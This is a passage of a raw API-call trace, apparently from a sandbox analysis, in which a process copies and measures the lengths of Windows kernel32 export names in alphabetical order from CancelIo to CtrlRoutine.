[0085.284] lstrlenA (lpString="CANCELIO") returned 8 [0085.284] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.285] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.285] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.285] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.285] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.285] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.285] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.285] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.285] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.285] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.285] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.285] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.285] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.285] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.285] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.285] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.285] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.285] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.285] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.285] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.285] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.285] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.285] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.285] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.285] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.285] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.285] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.285] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.285] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.285] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.285] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.285] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.285] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.285] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.285] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.285] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.285] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.285] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.285] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.286] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.286] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.286] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.286] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.286] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.286] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.286] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.286] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.286] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.286] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.286] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.286] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.286] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.286] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.286] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.286] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.286] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.286] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.286] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.286] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.286] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.286] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.286] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.286] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.286] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.286] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.286] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.286] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.286] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.286] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.286] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.286] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.286] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.286] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.286] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.286] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.286] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.287] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.287] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.287] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.287] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.287] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.287] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.287] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.287] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.287] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.287] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.287] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.287] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.287] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.287] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.287] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.287] lstrlenA (lpString="COPYFILEA") returned 9 [0085.287] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.287] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.287] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.287] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.287] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.287] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.287] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.287] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.287] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.287] lstrlenA (lpString="COPYFILEW") returned 9 [0085.287] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.287] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.287] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.287] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.287] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.287] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.287] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.287] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.287] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.287] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.287] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.288] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.288] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.288] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.288] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.288] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.288] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.288] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.288] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.288] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.288] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.288] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.288] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.288] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.288] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.288] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.288] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.288] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.288] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.288] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.288] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.288] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.288] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.288] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.288] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.288] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.288] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.288] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.288] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.288] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.288] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.288] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.288] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.288] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.288] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.288] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.288] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.288] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.289] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.289] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.289] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.289] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.289] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.289] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.289] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.289] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.289] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.289] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.289] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.289] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.289] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.289] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.289] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.289] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.289] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.289] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.289] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.289] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.289] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.289] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.289] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.289] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.289] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.289] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.289] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.289] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.289] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.289] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.289] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.289] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.289] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.289] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.289] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.289] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.289] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.289] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.290] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.290] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.290] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.290] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.290] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.290] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.290] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.290] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.290] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.290] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.290] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.290] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.290] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.290] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.290] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.290] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.290] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.290] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.290] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.290] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.290] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.290] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.290] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.290] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.290] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.290] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.290] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.290] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.290] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.290] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.290] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.290] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.290] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.290] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.290] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.290] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.290] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.291] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.291] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.291] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.291] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.291] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.291] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.291] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.291] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.291] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.291] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.291] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.291] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.291] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.291] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.291] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.291] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.291] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.291] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.291] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.291] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.291] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.291] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.291] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.291] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.291] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.291] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.291] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.291] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.291] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.291] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.291] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.291] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.291] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.291] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: 